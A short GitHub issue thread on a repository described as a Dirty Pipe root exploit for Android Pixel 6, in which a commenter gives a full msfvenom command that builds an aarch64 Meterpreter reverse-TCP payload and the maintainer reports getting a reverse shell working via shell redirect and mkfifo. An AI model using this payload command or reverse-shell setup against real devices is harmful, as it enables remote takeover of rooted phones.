polygraphene / DirtyPipe-Android

Dirty Pipe root exploit for Android (Pixel 6)
771 stars 130 forks source link

insecure telnetd :trollface: #2

Closed timwr closed 2 years ago

timwr commented 2 years ago

Have you tried replacing telnetd with meterpreter or a reverse shell? msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o met

polygraphene commented 2 years ago

Now we have reverse shell! :tada:

Unfortunately, the output from msfvenom was removed by antivirus. I used shell redirect and mkfifo.